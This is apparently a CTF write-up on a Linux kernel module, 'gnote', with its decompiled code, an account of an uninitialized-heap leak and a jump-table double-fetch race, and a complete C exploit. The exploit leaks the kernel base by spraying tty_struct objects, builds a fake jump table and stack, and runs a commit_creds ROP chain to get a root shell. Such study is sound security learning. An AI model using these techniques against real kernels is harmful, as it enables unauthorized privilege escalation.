Problem

Environment

  • linux version: 4.19.65
  • mmap_min_addr: 0x1000
  • No SMAP

Module

      /* User-controlled 8-byte request consumed by gnote_write():
       * cmd selects the operation, arg is its operand (size or index). */
      typedef struct request_t {
  uint32_t cmd;
  uint32_t arg;
} request_t;

/* write() handler of /proc/gnote (decompiled). `req` is the raw USER
 * pointer — the kernel dereferences it directly instead of copying the
 * request in, which is the root cause of the double-fetch bug described
 * below. (Fixed a transcription error: the local was declared as a second
 * `req`, shadowing the parameter, while `cur_note` was never declared.) */
int64_t gnote_write(struct file *a1, const request_t *req, size_t a3,
                    loff_t *a4) {
  uint64_t len;
  note_data_t *cur_note;
  void *new_note_data;

  mutex_lock(&lock);
  switch (req->cmd) {  /* req->cmd is fetched from user memory twice */
    case 1: /* add note */
      if ((uint64_t)cnt <= 7) {  /* at most 8 notes */
        len = (uint32_t)req->arg;
        cur_note = &notes[cnt];
        cur_note->len = len;  /* NOTE: len recorded even if alloc is skipped */
        if (len <= 0x10000) {
          /* kmalloc() does not zero the chunk -> uninitialized-heap leak */
          new_note_data = kmalloc(len, 0x6000C0LL);
          ++cnt;
          cur_note->data = new_note_data;
        }
      }
      break;
    case 2:
      printk("Edit Not implemented\n");
      break;
    case 3:
      printk("Delete Not implemented\n");
      break;
    case 4:
      printk("Copy Not implemented\n");
      break;
    case 5: /* select note for the next read() */
      if ((uint32_t)req->arg < (uint64_t)cnt) selected = (uint32_t)req->arg;
      break;
    default:
      break;
  }
  mutex_unlock(&lock);
  return a3;
}

/* read() handler of /proc/gnote (decompiled): copies the currently
 * selected note's buffer (never initialized by the module) to userland.
 * The selection is consumed, so each select allows exactly one read. */
uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) {
  note_data_t *cur_note;

  mutex_lock(&lock);
  if (selected == -1) {
    /* nothing selected -> report 0 bytes */
    mutex_unlock(&lock);
    return 0LL;
  } else {
    cur_note = &notes[selected];
    /* clamp to the recorded note length; the chunk itself was never zeroed */
    if (cur_note->len <= len) len = cur_note->len;
    copy_to_user(a2, cur_note->data, len); /* return value unchecked */
    selected = -1LL; /* one-shot: clear the selection */
    mutex_unlock(&lock);
    return len;
  }
}

The gnote module has just 3 features: add a new note, select a note and get a note’s content. With these features alone we cannot write content to a note (Edit is not implemented…).

Vulnerability

There are two vulnerabilities. The first is an uninitialized heap read and the second is a double-fetch bug in a switch statement.

Uninitialized heap

When we add a note, because the module just uses kmalloc (note that kmalloc does not clear its data), we can read the previous content of the allocated chunk. Therefore, if the chunk was previously used to store an object containing a vtable pointer, and that pointer was not cleared by SLUB or overwritten by another object, we can leak it.

Double fetch in switch statement

I think this is the main bug of this challenge. As we know, compilers sometimes implement a switch statement with a jump table as a speed optimization, and the switch statement of gnote_write is compiled to one. However, its index (key) is fetched directly from user space:

gnote_write:
  ; ...
  mov     rbx, rsi; rsi is const request_t __user *buf
  mov     r12, rdx
  call    mutex_lock
  cmp     dword ptr [rbx], 5 ; rbx is const request_t __user *buf
  ja      short DEFAULT_CASE
  mov     eax, [rbx]
  mov     rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 <= off <= 0x3effff68
  jmp     __x86_indirect_thunk_rax
  ; ...

The index (key) is fetched from user memory twice, by cmp dword ptr [rbx], 5 and by mov eax, [rbx]. So if [rbx] is less than or equal to 5 when cmp dword ptr [rbx], 5 executes, and we change [rbx] to another value before mov eax, [rbx], we can make the kernel read its jump-table entry from a (relatively) arbitrary address.

Exploit

Leak kernel base

As explained above, we can leak the kernel base using an uninitialized heap chunk. To do so, I heap-spray tty_struct objects by opening “/dev/ptmx” (see the leak_kernel_base function).

Exploit switch(__x86_indirect_thunk_rax) using double fetch

We can write code which causes a crash via an invalid jump-table index (key) (see jump_at_jump_table_idx, race1 and race2). However… there is no useful address in the (ro)data segment of the module…

At first I could not find a way to exploit the double fetch, so I looked more closely at the assembly of the switch statement:

gnote_write:
  ; ...
  mov     eax, [rbx]
  mov     rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 <= off <= 0x3effff68
  jmp     __x86_indirect_thunk_rax
  ; ...

Do you notice it? The target address in the jump table is calculated as key*8 - off, and off depends on the module’s base address (off = -(module_base + 0x1098)). Suppose off is 0x3fffef68 (meaning module_base is 0xffffffffc0000000). Under this assumption, if rax — the jump-table index (key) — is 0x7fffded, then key*8 - off is 0!! So we can access address 0 and use it as the jump table!!

In the given environment, SMAP is disabled. Therefore we can stack-pivot into a page mmapped with MAP_FIXED | MAP_POPULATE. Since mmap_min_addr is 0x1000 (which 0x200 table entries skip over, as 0x200 * 8 = 0x1000) and the minimum key giving a non-negative target is 0x7fffded, I think 0x200 + 0x7fffded is the best choice for a fixed key.

Exploit code

Because we cannot mmap the full 0x1000000-byte range that the table offset can span, I mmap only 0x400000 bytes. So the success rate of this exploit code is about 25% (0x400000 / 0x1000000).

      #define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define VULN_DEV_WRITE_CMD_ADD 1
#define VULN_DEV_WRITE_CMD_SELECT 5
#define VULN_DEV_WRITE_CMD_MAX 6
#define VULN_DEV_MAX_NOTE_COUNT 8

#define VULN_DEV_RELATIVE_IDX_OF_NOTES_TO_JUMP_TABLE 0x26d
#define FAKE_JUMP_TABLE_ADDR ((void*)0x1000)
#define FAKE_JUMP_TABLE_SIZE 0x400000
#define FAKE_STACK_ADDR ((void*)0x5d000000)
#define FAKE_STACK_SIZE 0x6000
#define FAKE_RSP (FAKE_STACK_ADDR + 5)

#define KERNEL_BASE_START 0xffffffff81000000
#define KERNEL_BASE_END 0xffffffffc0000000
#define IS_KERNEL_BASE(x) \
  ((KERNEL_BASE_START <= (x)) && ((x) <= KERNEL_BASE_END))
#define TTY_STRUCT_OPS_OFFSET (0xffffffff81a35260 - KERNEL_BASE_START)
#define MOV_ESP_0x5d000005_OFFSET (0xffffffff811f2bba - KERNEL_BASE_START)
#define POP_RDI_OFFSET (0xffffffff8101c20d - KERNEL_BASE_START)
#define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81069fe0 - KERNEL_BASE_START)
#define POP_RCX_OFFSET (0xffffffff81037523 - KERNEL_BASE_START)
#define MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET \
  (0xffffffff81018eef - KERNEL_BASE_START)
#define COMMIT_CREDS_OFFSET (0xffffffff81069df0 - KERNEL_BASE_START)
#define BYPASS_KPTI_OFFSET (0xffffffff81600a4a - KERNEL_BASE_START)

/* Print `msg` and block until a byte (e.g. enter) arrives on stdin. */
void get_enter_to_continue(const char* msg) {
  printf("%s\n", msg);
  (void)getchar();
}

/* Print `msg` plus the errno description and terminate with status -1. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);
}

/* Userland register snapshot consumed by the iretq frame at the end of
 * the ROP chain, so the kernel can return to ring 3 cleanly. */
uint64_t user_cs, user_ss, user_sp, user_rflags;
/* Capture cs, ss, rsp and rflags of the current (userland) context.
 * NOTE(review): operands are written dest-first (Intel order); this
 * presumably relies on building with -masm=intel — confirm build flags. */
static void save_state() {
  asm("mov %[u_cs], cs;\n"
      "mov %[u_ss], ss;\n"
      "mov %[u_sp], rsp;\n"
      "pushf;\n"
      "pop %[u_rflags];\n"
      : [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
        [u_rflags] "=r"(user_rflags)::"memory");
  printf(
      "[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
      "0x%lx\n",
      user_cs, user_ss, user_sp, user_rflags);
}

/* Final payload: spawn an interactive shell (reached with escalated creds). */
static void get_shell() {
  puts("[+] Get shell!");
  char* sh_argv[] = {"/bin/sh", NULL};
  char* sh_envp[] = {NULL};
  execve("/bin/sh", sh_argv, sh_envp);
}

/* Userland mirror of the module's request layout (see gnote_write). */
typedef struct request_t {
  uint32_t cmd; /* operation: 1 = add, 5 = select; re-fetched by the kernel */
  uint32_t arg; /* size for add, note index for select */
} request_t;

int vuln_fd;
int vuln_dev_added_count = 0;
void vuln_dev_add(uint64_t size) {
  ++vuln_dev_added_count;
  request_t req = {.cmd = VULN_DEV_WRITE_CMD_ADD, .arg = size};
  write(vuln_fd, &req, sizeof(req));
}
void vuln_dev_select(uint64_t idx) {
  request_t req = {.cmd = VULN_DEV_WRITE_CMD_SELECT, .arg = idx};
  write(vuln_fd, &req, sizeof(req));
}

void* page_buf;
request_t* page_req;
cpu_set_t cpus[2];

/* Leak the kernel base via the uninitialized-heap bug: spray tty_struct
 * objects (opening /dev/ptmx), free half, allocate a note of the same
 * size so it lands on a freed tty_struct, then read the stale contents
 * and recover the ops pointer. Returns (uint64_t)-1 on failure. */
uint64_t leak_kernel_base() {
  /* NOTE(review): loop runs 9 times but the module caps cnt at 8 notes,
   * so the last iteration's add is a no-op — confirm intent. */
  for (int cur_try = 0; cur_try <= VULN_DEV_MAX_NOTE_COUNT; ++cur_try) {
    int spray_fds[0x10];
    /* 0x2e0: allocation size matching the sprayed object — presumably
     * sizeof(tty_struct) on this 4.19.65 kernel; verify against build. */
    const int spray_obj_size = 0x2e0;
    const int spray_obj_count = sizeof(spray_fds) / sizeof(int);
    const int middle_idx = spray_obj_count / 2;
    for (int i = 0; i < spray_obj_count; ++i) {
      spray_fds[i] = open("/dev/ptmx", O_NOCTTY | O_RDONLY);
    }
    /* free the first half, allocate the note into a freed slot, then
     * free the rest (ordering matters for SLUB freelist reuse) */
    for (int i = 0; i < middle_idx; ++i) {
      close(spray_fds[i]);
    }
    vuln_dev_add(spray_obj_size);
    for (int i = middle_idx; i < spray_obj_count; ++i) {
      close(spray_fds[i]);
    }

    vuln_dev_select(cur_try);
    read(vuln_fd, page_buf, spray_obj_size);
    /* +0x18: offset of the ops pointer within the stale object —
     * presumably tty_struct->ops; confirm against kernel layout. */
    uint64_t maybe_tty_struct_ops = *(uint64_t*)(page_buf + 0x18);
    uint64_t maybe_kbase = maybe_tty_struct_ops - TTY_STRUCT_OPS_OFFSET;
    /* kernel base is 1 MiB aligned and within the KASLR window */
    if ((maybe_kbase & 0xfffff) == 0 && IS_KERNEL_BASE(maybe_kbase)) {
      return maybe_kbase;
    }
  }

  return (uint64_t)-1;
}

/* Race-coordination state shared between main and the racer threads.
 * `do_race` is volatile: it is written by main and polled by the racer
 * loops, and a plain int gives the compiler licence to cache it. */
volatile int do_race = 0;
int jump_table_idx; /* fake jump-table index stored by race2 */

/* Racer A: keep storing a valid cmd (5) so the kernel's first fetch
 * (`cmp dword ptr [rbx], 5`) passes the bounds check. */
void* race1(void* arg) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) {
    fatal("sched_setaffinity");
  }
  while (do_race) {
    page_req->cmd = VULN_DEV_WRITE_CMD_SELECT;
  }
  return NULL; /* pthread start routines must return a void* */
}

/* Racer B: keep storing the huge index so the kernel's second fetch
 * (`mov eax, [rbx]`) reads its jump-table entry from low memory. */
void* race2(void* arg) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) {
    fatal("sched_setaffinity");
  }
  const uint64_t const_jump_table_idx = jump_table_idx;
  while (do_race) {
    page_req->cmd = const_jump_table_idx;
  }
  return NULL;
}

/* Drive the double-fetch race: the main thread keeps submitting requests
 * while race1/race2 (pinned to CPU 1) flip req->cmd between the valid
 * case 5 and the out-of-range fake jump-table index. Never returns on
 * success — the kernel pivots into the ROP chain instead. */
void jump_at_jump_table_idx() {
  page_req->arg = 0;
  /* Arm the flag BEFORE spawning the racers: with the original ordering
   * (do_race set after pthread_create) an early-scheduled racer could
   * observe do_race == 0 and return immediately, killing the race. */
  do_race = 1;
  pthread_t th1;
  pthread_create(&th1, NULL, race1, &cpus[1]);
  pthread_t th2;
  pthread_create(&th2, NULL, race2, &cpus[1]);
  while (1) {
    page_req->cmd = VULN_DEV_WRITE_CMD_SELECT;
    write(vuln_fd, page_buf, 0x1000);
  }
}

int main() {
  /* Pin main to CPU 0; the racer threads run on CPU 1 so the kernel's
   * double-fetch window is attacked from another core. */
  for (int i = 0; i < 2; ++i) {
    CPU_ZERO(&cpus[i]);
    CPU_SET(i, &cpus[i]);
  }
  if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus[0])) {
    fatal("sched_setaffinity");
  }

  save_state();

  vuln_fd = open("/proc/gnote", O_RDWR);
  if (vuln_fd < 0) {
    fatal("open(/proc/gnote)");
  }

  /* Scratch page shared with the racer threads; it is also the request
   * buffer passed to write(), so the kernel double-fetches from it. */
  page_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page_buf == MAP_FAILED) {
    fatal("mmap");
  }
  page_req = (request_t*)page_buf;
  printf("[*] page_buf addr: %p\n", page_buf);

  /* NOTE(review): kernel_base may be (uint64_t)-1 on leak failure; the
   * exploit continues regardless — consider bailing out here. */
  uint64_t kernel_base = leak_kernel_base();
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  /* Fake jump table at the lowest mappable address (mmap_min_addr =
   * 0x1000), pre-faulted with MAP_POPULATE and filled with the stack
   * pivot gadget. Only 0x400000 of the ~0x1000000-byte range that the
   * table offset can span is covered, hence the ~25% success rate. */
  void* fake_jump_table =
      mmap(FAKE_JUMP_TABLE_ADDR, FAKE_JUMP_TABLE_SIZE, PROT_READ | PROT_WRITE,
           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0);
  if (fake_jump_table == MAP_FAILED) {
    fatal("mmap");
  }
  for (uint64_t* cur = fake_jump_table;
       (void*)cur < fake_jump_table + FAKE_JUMP_TABLE_SIZE; ++cur) {
    *cur = kernel_base + MOV_ESP_0x5d000005_OFFSET;
  }
  printf("[*] fake_jump_table addr: %p\n", fake_jump_table);

  /* Userland page that becomes the kernel stack after the gadget sets
   * esp to 0x5d000005 — usable because SMAP is disabled. Mapped so the
   * pivot target sits in the middle of the mapping. */
  void* fake_stack =
      mmap(FAKE_STACK_ADDR - FAKE_STACK_SIZE / 2, FAKE_STACK_SIZE,
           PROT_READ | PROT_WRITE,
           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0);
  if (fake_stack == MAP_FAILED) {
    fatal("mmap");
  }
  printf("[*] fake_stack addr: %p\n", fake_stack);

  printf("[*] Build ROP Chain @ %p...\n", fake_stack);
  /* Chain: commit_creds(prepare_kernel_cred(0)), then return to ring 3
   * through the KPTI trampoline using the state saved in save_state(). */
  uint64_t* rop_buf = FAKE_RSP;
  *rop_buf++ = kernel_base + POP_RDI_OFFSET;
  *rop_buf++ = 0; /* rdi = 0 -> prepare_kernel_cred(0) */
  *rop_buf++ = kernel_base + PREPARE_KERNEL_CRED_OFFSET;
  *rop_buf++ = kernel_base + POP_RCX_OFFSET;
  *rop_buf++ = 0; /* rcx = 0 — presumably neutralizes a rep prefix in the
                     mov rdi, rax gadget below; confirm gadget bytes */
  *rop_buf++ = kernel_base + MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET;
  *rop_buf++ = 0xdeadbeefcafebe00; /* dummy rbp popped by the gadget */
  *rop_buf++ = kernel_base + COMMIT_CREDS_OFFSET;
  *rop_buf++ = kernel_base + BYPASS_KPTI_OFFSET;
  *rop_buf++ = 0xdeadbeefcafebe01; /* padding consumed by the trampoline */
  *rop_buf++ = 0xdeadbeefcafebe02;
  *rop_buf++ = (uint64_t)(get_shell);  // user_rip
  *rop_buf++ = (uint64_t)(user_cs);
  *rop_buf++ = (uint64_t)(user_rflags);
  *rop_buf++ = (uint64_t)(user_sp);
  *rop_buf++ = (uint64_t)(user_ss);

  /* 0x7fffded * 8 cancels the jump-table displacement (lands at 0);
   * +0x200 shifts the access to 0x1000 (0x200 * 8), the first mappable
   * address given mmap_min_addr. */
  jump_table_idx = 0x200 + 0x7fffded;
  printf("[*] jump_table_idx: 0x%08x\n", jump_table_idx);
  puts("[*] Do race condition attack at jump table used in switch...");
  jump_at_jump_table_idx();

  /* not reached on success */
  close(vuln_fd);
  return 0;
}

Reference